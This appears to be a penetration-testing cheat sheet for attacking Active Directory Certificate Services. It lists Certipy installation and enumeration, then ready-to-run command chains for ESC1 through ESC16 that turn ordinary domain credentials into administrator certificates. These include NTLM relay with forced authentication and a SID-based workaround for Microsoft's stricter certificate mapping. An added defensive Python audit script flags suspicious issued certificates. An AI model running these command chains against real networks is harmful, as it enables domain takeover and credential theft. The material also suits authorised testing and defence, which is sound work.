Installation
https://github.com/ly4k/Certipy/wiki/04-%E2%80%90-Installation
sudo apt update && sudo apt install -y python3 python3-pip
python3 -m venv certipy-venv
source certipy-venv/bin/activate
pip install certipy-ad
or
pipx install -f "git+https://github.com/ly4k/Certipy.git"
Enumeration
Find PKI Enrollment Services and certificate template names in Active Directory
nxc ldap ip -u username -p password -M adcs
Search for vulnerable certificate templates
certipy find -u username -p password -target dc -dc-ip ip -enabled -vulnerable -stdout
Attacks
ESC1
addcomputer.py domain/username:password -computer-name computer_name -computer-pass computer_password
certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip
Or
certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip
If certipy reports Minimum RSA Key Length : 4096 for the template, you need to add -key-size 4096:
certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip
New update:
By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers move to Full Enforcement mode (KB5014754):
https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
Fix: add the SID of the target account to the request
certipy req -u username -p password -ca ca -target domain -template template -upn administrator -sid <administrator sid> -dc-ip ip
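For the defensive side of the ESC1 and SID-mapping notes above, here is an added audit script (not from the original page or from Certipy) that reviews issued-certificate records for a SAN UPN that names a different account than the requester, a missing SID mapping extension, and an undersized key. The records and their field names (requester, san_upn, extensions, key_size) are constructed assumptions, not a real CA export format.

```python
# Added example, not part of the original page or of Certipy. Records are constructed;
# the field names (requester, san_upn, extensions, key_size) are assumptions, not a CA log schema.
SID_EXT_OID = "1.3.6.1.4.1.311.25.2"  # szOID_NTDS_CA_SECURITY_EXT: the SID mapping extension

SAMPLE_RECORDS = [
    {"request_id": 101, "requester": "CORP\\jdoe", "template": "User",
     "san_upn": "jdoe@corp.local", "extensions": [SID_EXT_OID], "key_size": 2048},
    # ESC1 symptom: a low-privilege requester, but the SAN UPN names administrator
    {"request_id": 102, "requester": "CORP\\jdoe", "template": "VulnTemplate",
     "san_upn": "administrator@corp.local", "extensions": [], "key_size": 2048},
    {"request_id": 103, "requester": "CORP\\WS01$", "template": "Machine",
     "san_upn": "WS01$@corp.local", "extensions": [SID_EXT_OID], "key_size": 4096},
    {"request_id": 104, "requester": "CORP\\svc_backup", "template": "User",
     "san_upn": "svc_backup@corp.local", "extensions": [], "key_size": 1024},
]

def account_of(name: str) -> str:
    """Reduce 'DOMAIN\\user', 'user@domain' or 'user' to a lowercase account name."""
    name = name.strip().lower()
    if "\\" in name:
        name = name.rsplit("\\", 1)[1]
    if "@" in name:
        name = name.split("@", 1)[0]
    return name

def audit_record(rec: dict, min_key_size: int = 2048) -> list:
    """Return the reasons one issued certificate deserves review (empty list if none)."""
    reasons = []
    # A SAN UPN naming a different account than the requester is the ESC1 pattern
    if rec.get("san_upn") and account_of(rec["san_upn"]) != account_of(rec["requester"]):
        reasons.append("san_upn_mismatch")
    # No SID extension means only a weak mapping; rejected for PKINIT under Full Enforcement
    if SID_EXT_OID not in rec.get("extensions", []):
        reasons.append("missing_sid_extension")
    if rec.get("key_size", 0) < min_key_size:
        reasons.append("weak_key")
    return reasons

def audit(records, min_key_size: int = 2048) -> dict:
    """Map request_id -> reasons for every record with at least one finding."""
    findings = {}
    for rec in records:
        reasons = audit_record(rec, min_key_size)
        if reasons:
            findings[rec["request_id"]] = reasons
    return findings

if __name__ == "__main__":
    for request_id, reasons in audit(SAMPLE_RECORDS).items():
        print(request_id, ", ".join(reasons))
```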
ESC3
certipy req -u username -p password -ca ca -target domain -template template
certipy req -u username -p password -ca ca -target domain -template User -on-behalf-of administrator -pfx pfx_file
certipy auth -pfx administrator.pfx -dc-ip ip
ESC4
certipy template -u username -p password -template template -save-old -dc-ip ip
certipy req -u username -p password -dc-ip ip -ca ca -target dc -template template -upn administrator
certipy auth -pfx administrator.pfx -domain domain -u administrator -dc-ip ip
ESC7
certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
certipy ca -ca ca -issue-request request_ID -u username@domain -p password
certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip
ESC8
ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
certipy auth -pfx administrator.pfx
ESC9
certipy shadow auto -u username@domain -hashes :hash -account target_username
certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target $DC_IP
certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
certipy auth -pfx administrator.pfx -domain domain
ESC13
certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip -key-size 4096
python3 gettgtpkinit.py -cert-pfx pfx_file domain/username ccache_file -dc-ip ip -v
ESC14 - Scenario B
https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9#4a82
bloodyAD --host dc -d domain -u username -p password set object target altSecurityIdentities -v 'X509:<RFC822>target@domain'
bloodyAD --host dc -d domain -u owned_user -p password set object target mail -v target@domain
certipy account update -u owned_user@domain -p password -user username -upn target
certipy req -u username -p password -ca ca -template template -dc-ip ip
certipy account update -u owned_user -p password -user username -upn username@domain -dc-ip ip
certipy auth -pfx pfx -dc-ip ip -user target -domain domain
ESC15
Method 1
certipy req -u username@domain -p password -dc-ip ip -ca ca -template WebServer -application-policies 'Certificate Request Agent'
certipy req -u username@domain -p password -dc-ip ip -ca ca -template User -pfx user.pfx -on-behalf-of 'DOMAIN\Administrator'
certipy auth -pfx administrator.pfx -dc-ip ip
Method 2
certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template template -upn administrator@domain -sid <administrator sid> -application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -dc-ip ip -ldap-shell
ESC16
This requires a user (username) with GenericAll or GenericWrite over the account whose UPN is rewritten (owned_user).
certipy account -u username@domain -p password -dc-ip ip -upn administrator -user owned_user update
certipy req -u owned_user@domain -p password -dc-ip ip -target dc -ca ca -template User -upn administrator@domain -sid <administrator sid>
certipy account -u username@domain -p password -dc-ip ip -upn owned_user -user owned_user update
certipy auth -pfx administrator.pfx -dc-ip ip -domain domain
Resources